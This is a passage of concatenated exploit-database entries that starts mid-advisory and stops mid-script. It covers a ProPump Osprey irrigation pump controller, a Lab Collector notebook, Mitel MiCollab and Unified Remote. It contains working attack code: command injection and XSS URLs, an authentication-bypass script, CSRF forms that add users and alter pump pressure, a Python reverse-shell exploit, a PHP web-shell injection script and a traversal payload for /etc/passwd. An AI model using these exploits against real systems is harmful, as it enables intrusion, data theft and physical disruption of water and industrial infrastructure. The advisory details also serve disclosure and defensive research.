familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The pump controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'userName' HTTP POST parameter called by index.php script. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5749 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5749.php 05.01.2023 -- $ curl -s http://TARGET/index.php --data="userName=;sleep%2017&pseudonym=251" HTTP/1.1 200 OK

# Exploit Title: Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: Input passed to the GET parameter 'userName' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML/JS code in a user's browser session in context of an affected site. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5751 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5751.php 05.01.2023 -- http://TARGET/index.php?userName=%22%3E%3Cscript%3Econfirm(251)%3C/script%3E

#!/usr/bin/env python # # Exploit Title: Osprey Pump Controller v1.0.1 - Authentication Bypass Credentials Modification # Exploit Author: LiquidWorm # # Vendor: ProPump and Controls, Inc. # Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com # Affected version: Software Build ID 20211018, Production 10/18/2021 # Mirage App: MirageAppManager, Release [1.0.1] # Mirage Model 1, RetroBoard II # # # Summary: Providing pumping systems and automated controls for # golf courses and turf irrigation, municipal water and sewer, # biogas, agricultural, and industrial markets. Osprey: door-mounted, # irrigation and landscape pump controller. # # Technology hasn't changed dramatically on pump and electric motors # in the last 30 years. Pump station controls are a different story. # More than ever before, customers expect the smooth and efficient # operation of VFD control. Communications—monitoring, remote control, # and interfacing with irrigation computer programs—have become common # requirements. Fast and reliable accessibility through cell phones # has been a game changer. # # ProPump & Controls can handle any of your retrofit needs, from upgrading # an older relay logic system to a powerful modern PLC controller, to # converting your fixed speed or first generation VFD control system to # the latest control platform with communications capabilities. # # We use a variety of solutions, from MCI-Flowtronex and Watertronics # package panels to sophisticated SCADA systems capable of controlling # and monitoring networks of hundreds of pump stations, valves, tanks, # deep wells, or remote flow meters. # # User friendly system navigation allows quick and easy access to all # critical pump station information with no password protection unless # requested by the customer. Easy to understand control terminology allows # any qualified pump technician the ability to make basic changes without # support. Similar control and navigation platform compared to one of the # most recognized golf pump station control systems for the last twenty # years make it familiar to established golf service groups nationwide. # Reliable push button navigation and LCD information screen allows the # use of all existing control panel door switches to eliminate the common # problems associated with touchscreens. # # Global system configuration possibilities allow it to be adapted to # virtually any PLC or relay logic controlled pump stations being used in # the industrial, municipal, agricultural and golf markets that operate # variable or fixed speed. On board Wi-Fi and available cellular modem # option allows complete remote access. # # Desc: A vulnerability has been discovered in the web panel of Osprey pump # controller that allows an unauthenticated attacker to create an account # and bypass authentication, thereby gaining unauthorized access to the # system. The vulnerability stems from a lack of proper authentication # checks during the account creation process, which allows an attacker # to create a user account without providing valid credentials. An attacker # who successfully exploits this vulnerability can gain access to the pump # controller's web panel, and cause disruption in operation, modify data, # change other usernames and passwords, or even shut down the controller # entirely. # # The attacker can leverage their unauthorized access to the # system to carry out a variety of malicious activities, including: # Modifying pump settings, such as flow rates or pressure levels, causing # damage or loss of control, stealing sensitive data, such as system logs # or customer information, changing passwords and other user credentials, # potentially locking out legitimate users or allowing the attacker to # maintain persistent access to the system, disabling or shutting down # the controller entirely, potentially causing significant disruption to # operations and service delivery. # # ---------------------------------------------------------------------- # $ ./accpump.py 192.168.0.25 root rewt # [ ok ] # [ ok ] # Login with 'root:rewt' -> Register Access Menu. # ---------------------------------------------------------------------- # # Tested on: Apache/2.4.25 (Raspbian) # Raspbian GNU/Linux 9 (stretch) # GNU/Linux 4.14.79-v7+ (armv7l) # Python 2.7.13 [GCC 6.3.0 20170516] # GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git # PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5752 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5752.php # # # 05.01.2023 # import requests import sys as s if len(s.argv)!=4: print("Osprey Pump Controller Bypass Exploit") print("Arguments: [host] [username] [password]") exit(-3) else: url=s.argv[1] usr=s.argv[2] pwd=s.argv[3] if not "http" in url: url="http://{}".format(url) # # Data names . Values # # USERNAME0 . user # USERNAME1 . # USERNAME2 . # USERNAME3 . # USERNAME4 . # USERPW0 . 1234 # USERPW1 . # USERPW2 . # USERPW3 . # USERPW4 . # url+="/" url+="setSystemText" url+=".php" paru={"sysTextValue" :usr, "sysTextName" :"USERNAME3", "backTargetLinkNumber":75, "userName" :"ZSL"} parp={"sysTextValue" :pwd, "sysTextName" :"USERPW3", "backTargetLinkNumber":75, "userName" :"WriteExploit"} r=requests.get(url,params=paru) if 'System String "USERNAME3" set' in r.text: print("[ ok ]") else: print(f"Error: {r.status_code} {r.reason} - {r.text}") r=requests.get(url,params=parp) if 'System String "USERPW3" set' in r.text: print("[ ok ]") print(f"Login with '{usr}:{pwd}' ",end="") print("-> Register Access Menu.") else: print(f"Error: {r.status_code} {r.reason} - {r.text}")

<!-- # Exploit Title: Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5753 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5753.php 05.01.2023 --> CSRF Add User: -------------- <html> <body> <form action="http://TARGET/setSystemText.php"> <input type="hidden" name="sysTextValue" value="test" /> <input type="hidden" name="sysTextName" value="USERNAME1" /> <input type="hidden" name="backTargetLinkNumber" value="75" /> <input type="hidden" name="userName" value="ZSL" /> <input type="submit" value="Add user" /> </form> </body> </html> CSRF Set Password: ------------------ <html> <body> <form action="http://TARGET/setSystemText.php"> <input type="hidden" name="sysTextValue" value="pass" /> <input type="hidden" name="sysTextName" value="USERPW1" /> <input type="hidden" name="backTargetLinkNumber" value="75" /> <input type="hidden" name="userName" value="t00t" /> <input type="submit" value="Set pass" /> </form> </body> </html> CSRF Set System Pressure Raw: ----------------------------- <html> <body> <form action="http://TARGET/mbSetRegister_Int.php"> <input type="hidden" name="regValue" value="17301" /> <input type="hidden" name="regAddress" value="40900" /> <input type="hidden" name="minValue" value="0" /> <input type="hidden" name="maxValue" value="32767" /> <input type="hidden" name="backTargetLinkNumber" value="414" /> <input type="hidden" name="userName" value="w00t" /> <input type="submit" value="Modify pressure" /> </form> </body> </html>

#!/usr/bin/env python # # # Exploit Title: Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit # Exploit Author: LiquidWorm # # # Vendor: ProPump and Controls, Inc. # Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com # Affected version: Software Build ID 20211018, Production 10/18/2021 # Mirage App: MirageAppManager, Release [1.0.1] # Mirage Model 1, RetroBoard II # # # Summary: Providing pumping systems and automated controls for # golf courses and turf irrigation, municipal water and sewer, # biogas, agricultural, and industrial markets. Osprey: door-mounted, # irrigation and landscape pump controller. # # Technology hasn't changed dramatically on pump and electric motors # in the last 30 years. Pump station controls are a different story. # More than ever before, customers expect the smooth and efficient # operation of VFD control. Communications—monitoring, remote control, # and interfacing with irrigation computer programs—have become common # requirements. Fast and reliable accessibility through cell phones # has been a game changer. # # ProPump & Controls can handle any of your retrofit needs, from upgrading # an older relay logic system to a powerful modern PLC controller, to # converting your fixed speed or first generation VFD control system to # the latest control platform with communications capabilities. # # We use a variety of solutions, from MCI-Flowtronex and Watertronics # package panels to sophisticated SCADA systems capable of controlling # and monitoring networks of hundreds of pump stations, valves, tanks, # deep wells, or remote flow meters. # # User friendly system navigation allows quick and easy access to all # critical pump station information with no password protection unless # requested by the customer. Easy to understand control terminology allows # any qualified pump technician the ability to make basic changes without # support. Similar control and navigation platform compared to one of the # most recognized golf pump station control systems for the last twenty # years make it familiar to established golf service groups nationwide. # Reliable push button navigation and LCD information screen allows the # use of all existing control panel door switches to eliminate the common # problems associated with touchscreens. # # Global system configuration possibilities allow it to be adapted to # virtually any PLC or relay logic controlled pump stations being used in # the industrial, municipal, agricultural and golf markets that operate # variable or fixed speed. On board Wi-Fi and available cellular modem # option allows complete remote access. # # Desc: The controller suffers from an unauthenticated command injection # vulnerability that allows system access with www-data permissions. # # ---------------------------------------------------------------------- # Triggering command injection... # Trying vector: /DataLogView.php # Operator...? # You got a call from 192.168.3.180:54508 # www-data@OspreyController:/var/www/html$ id;pwd # uid=33(www-data) gid=33(www-data) groups=33(www-data) # /var/www/html # www-data@OspreyController:/var/www/html$ exit # Zya! # ---------------------------------------------------------------------- # # Tested on: Apache/2.4.25 (Raspbian) # Raspbian GNU/Linux 9 (stretch) # GNU/Linux 4.14.79-v7+ (armv7l) # Python 2.7.13 [GCC 6.3.0 20170516] # GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git # PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # Macedonian Information Security Research and Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5754 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php # # # 05.01.2023 # # o o # O O # o o # o o #_____________________\ / # || # || # || from time import sleep import pygame.midi #---# import subprocess #---# import threading #-----# import telnetlib #-----# import requests #-------# import socket #-----------# import pygame #-----------# import random #-----------# import sys #---------------# import re #-----------------# ###### # #-----------------# class Pump__it__up: def __init__(self): self.sound=False self.param="eventFileSelected" self.vector=["/DataLogView.php?"+self.param, "/AlarmsView.php?"+self.param, "/EventsView.php?"+self.param, "/index.php"] # POST self.payload=None self.sagent="Tic" self.rhost=None self.lhost=None self.lport=None def propo(self): if len(sys.argv)!=4: self.kako() else: self.presh() self.rhost=sys.argv[1] self.lhost=sys.argv[2] self.lport=int(sys.argv[3]) if not "http" in self.rhost: self.rhost="http://{}".format(self.rhost) def kako(self): self.pumpaj() print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0])) exit(0) def pumpaj(self): titl=""" .-. | \\ | / \\ ,___| | \\ / ___( ) L '-` | | | | | F | | / | | | | ____|_|____ [___________] ,,,,,/,,,,,,,,,,,,,\\,,,,, o-------------------------------------o Osprey Pump Controller RCE Rev Shel_ v1.0j Ref: ZSL-2023-5754 by lqwrm, 2023 o-------------------------------------o """ print(titl) def injekcija(self): self.headers={"Accept":"*/*", "Connection":"close", "User-Agent":self.sagent, "Cache-Control":"max-age=0", "Accept-Encoding":"gzip,deflate", "Accept-Language":"en-US,en;q=0.9"} self.payload =";"######################################################" self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;" self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con" self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2" self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno()," self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######" print("Triggering command injection...") for url in self.vector: if url=="/index.php": print("Trying vector:",url) import urllib.parse self.headers["Content-Type"]="application/x-www-form-urlencoded" self.postdata={"userName":urllib.parse.unquote(self.payload), "pseudonym":"251"} r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata) if r.status_code == 200: break else: print("Trying vector:",url[:-18]) r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers) print("Code:",r.status_code) if r.status_code == 200: print('Access Granted!') break def netcat(self): import nclib server = nclib.TCPServer(("0.0.0.0",int(self.lport))) print("Operator...?") server.sock.settimeout(7) for client in server: print("You got a call from %s:%d" % client.peer) command="" while command!="exit": if len(command)>0: if command in client.readln().decode("utf-8").strip(" "): pass data = client.read_until('$') print(data.decode("utf-8"), end="") command = input(" ") client.writeln(command) print("Zya!") exit(1) def rasplet(self): if self.sound: konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain) konac1.start() konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat) konac2.start() self.injekcija() def presh(self): titl2=""" _______________________________________ / \\ | {###################################} | | {## Osprey Pump Controller ##} | | {## RCE 0day ##} | | {## ##} | | {## ZSL-2023-5754 ##} | | {###################################} | | | | 80 90 100 | | 70 ^ 120 | | 60 * /|\ * 140 | | 55 | 160 | | | | | | | | (O) (+) (O) | \_______________________________________/ """ print(titl2) def entertain(self): pygame.midi.init() midi_output=pygame.midi.Output(0) notes=[ (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251), (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251), (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251), (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251), (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251), (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251), (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251), (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251), (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251), (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251), (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251), (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251), (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251), (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251), (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251), (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251), (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251), (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251), (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251), (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251), (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251), (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)] channel=0 velocity=124 for note, duration in notes: midi_output.note_on(note, velocity, channel) duration=59 pygame.time.wait(random.randint(100,301)) pygame.time.wait(duration) midi_output.note_off(note, velocity, channel) del midi_output pygame.midi.quit() def main(self): self.propo() self.rasplet() exit(1) if __name__=='__main__': Pump__it__up().main()

# Exploit Title: Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) # Date: 2023-02-28 # Exploit Author: Anthony Cole # Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/ # Version: v4.234 # Contact: http://twitter.com/acole76 # Website: http://twitter.com/acole76 # Tested on: PHP/MYSQL # CVE: CVE-2023-24217 # Category: webapps # # Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system. # from argparse import ArgumentParser from requests import Session from random import choice from string import ascii_lowercase, ascii_uppercase, digits import re from base64 import b64encode from urllib.parse import quote_plus sess:Session = Session() cookies = {} headers = {} state = {} def random_string(length:int) -> str: return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length)) def login(base_url:str, username:str, password:str) -> bool: data = {"login": username, "pass": password, "Submit":"", "action":"login"} headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile" res = sess.post(f"{base_url}/login.php", data=data, headers=headers) if("My profile" in res.text): return res.text else: return None def logout(base_url:str) -> bool: headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update" sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers) def extract_field_value(contents, name): value = re.findall(f'name="{name}" value="(.*)"', contents) if(len(value)): return value[0] else: return "" def get_profile(html:str): return { "contact_name": extract_field_value(html, "contact_name"), "contact_lab": extract_field_value(html, "contact_lab"), "contact_address": extract_field_value(html, "contact_address"), "contact_city": extract_field_value(html, "contact_city"), "contact_zip": extract_field_value(html, "contact_zip"), "contact_country": extract_field_value(html, "contact_country"), "contact_tel": extract_field_value(html, "contact_tel"), "contact_email": extract_field_value(html, "contact_email") } def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool: headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update" res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers) return True def execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str): session_file = sess.cookies.get("PHPSESSID") headers["Referer"] = f"{base_url}/login.php?%2F" page = f"../../../../../..{session_path}/sess_{session_file}" res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers) return parse_output(res.text, wrapper) def exploit(args) -> None: wrapper = random_string(5) param = random_string(3) html = login(args.url, args.login_username, args.login_password) if(html == None): print("unable to login") return False clean = get_profile(html) data = get_profile(html) tag = b64encode(wrapper.encode()).decode() payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>" data["contact_name"] = payload #inject payload in name field if(update_profile(args.url, wrapper, param, data)): login(args.url, args.login_username, args.login_password) # reload the session w/ our payload print(execute_command(args.url, wrapper, param, args.sessions, args.cmd)) update_profile(args.url, wrapper, param, clean) # revert the profile logout(args.url) def parse_output(contents, wrapper) -> None: matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL) if(len(matches)): return matches[0] return None def main() -> None: parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217") parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.") parser.add_argument("--login-username", "-lu", required=True, help="Username.") parser.add_argument("--login-password", "-lp", required=True, help="Password.") parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.") parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.") args = parser.parse_args() if(args.url.endswith("/")): args.url = args.url[:-1] if(args.sessions.endswith("/")): args.sessions = args.sessions[:-1] exploit(args) pass if(__name__ == "__main__"): main()

# Exploit Title: Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The pump controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'eventFileSelected' HTTP GET parameter called by DataLogView.php, EventsView.php and AlarmsView.php scripts. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5750 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5750.php 05.01.2023 -- $ curl -s http://TARGET/DataLogView.php?eventFileSelected=;id $ curl -s http://TARGET/EventsView.php?eventFileSelected=|id $ curl -s http://TARGET/AlarmsView.php?eventFileSelected=`id` HTTP/1.1 200 OK uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI # Date: 2022-10-14 # Fix Date: 2020-05 # Exploit Author: Kahvi-0 # Github: https://github.com/Kahvi-0 # Vendor Homepage: https://www.mitel.com/ # Vendor Security Advisory: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005 # Version: before 8.1.2.4 and 9.x before 9.1.3 # CVE: CVE-2020-11798 # CVE Reported By: Tri Bui Description: A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories Payload: https://[site]/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd

# Exploit Title: Unified Remote 3.13.0 - Remote Code Execution (RCE) # Google Dork: NA # Date: 03/03/2023 # Exploit Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://www.unifiedremote.com/download/windows # Version: 3.13.0 (Current) # Tested on: Windows # CVE : NA # Due to the use of Access-Control-Allow-Origin: * on the 'Remote' upload endpoint used by Unified Remote Desktop # Any internet originating webpage can make requests in the user's browser to the localhost endpoint to upload a crafted # Remote zip file blob. This contains a remote.lua file which will be loaded and executed in the context of the current user # The below script will automatically update the executing command and host the payload delivery webpage # which can be sent to target users or included in site pages as part of social engineering import os, sys, zipfile, tempfile, base64, http.server, threading, argparse, tempfile, time, random, string from contextlib import redirect_stdout from http.server import HTTPServer, BaseHTTPRequestHandler parser = argparse.ArgumentParser(description='Unified Remote - Web Triggerable RCE') parser.add_argument('-p','--port', help='HTTP Server Port, Default (80)', default=80, required=False) parser.add_argument('-i','--ip', help='HTTP Server IP Address', required=True) args = vars(parser.parse_args()) html_404 = "PGRpdiBpZD0ibWFpbiI+CiAgICAJPGRpdiBjbGFzcz0iZm9mIj4KICAgICAgICAJCTxoMT5FcnJvciA0MDQ8L2gxPg" html_404 += "ogICAgCTwvZGl2Pgo8L2Rpdj4K" htmlpage = "PGh0bWw+Cjxib2R5Pgo8cD5NeSBEZW1vIEFwYWNoZSBTaXRlIC0gV29yayBJbiBQcm9ncmVzcywgU3RheSBUdW5lZC" htmlpage += "E8L3A+CjxzY3JpcHQ+CiAgbGV0IGJhc2U2NHppcCA9ICJwbGFjZWhvbGRlcmI2NHZhbCI7CiAgbGV0IGJpbmFyeSA9" htmlpage += "IGF0b2IoYmFzZTY0emlwKTsKICBsZXQgYXJyYXkgPSBbXTsKICBmb3IgKGxldCBpID0gMDsgaSA8IGJpbmFyeS5sZW" htmlpage += "5ndGg7IGkrKykgewogICAgYXJyYXkucHVzaChiaW5hcnkuY2hhckNvZGVBdChpKSk7CiAgfQoKICBsZXQgYmxvYiA9" htmlpage += "IG5ldyBCbG9iKFtuZXcgVWludDhBcnJheShhcnJheSldLCB7IHR5cGU6ICJhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW" htmlpage += "0iIH0pOwogIGxldCB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKICB4aHIub3BlbigiUE9TVCIsImh0dHA6Ly9s" htmlpage += "b2NhbGhvc3Q6OTUxMC9zeXN0ZW0vcmVtb3RlL2FkZD9maWxlbmFtZT16aXBmaWxlbmFtZXRvYmVjaGFuZ2VkLnppcC" htmlpage += "IsZmFsc2UpOwogIHhoci5zZXRSZXF1ZXN0SGVhZGVyKCdDb250ZW50LVR5cGUnLCAnYXBwbGljYXRpb24veC13d3ct" htmlpage += "Zm9ybS11cmxlbmNvZGVkJyk7CiAgeGhyLnNlbmQoYmxvYik7Cjwvc2NyaXB0Pgo8L2JvZHk+CjwvaHRtbD4=" 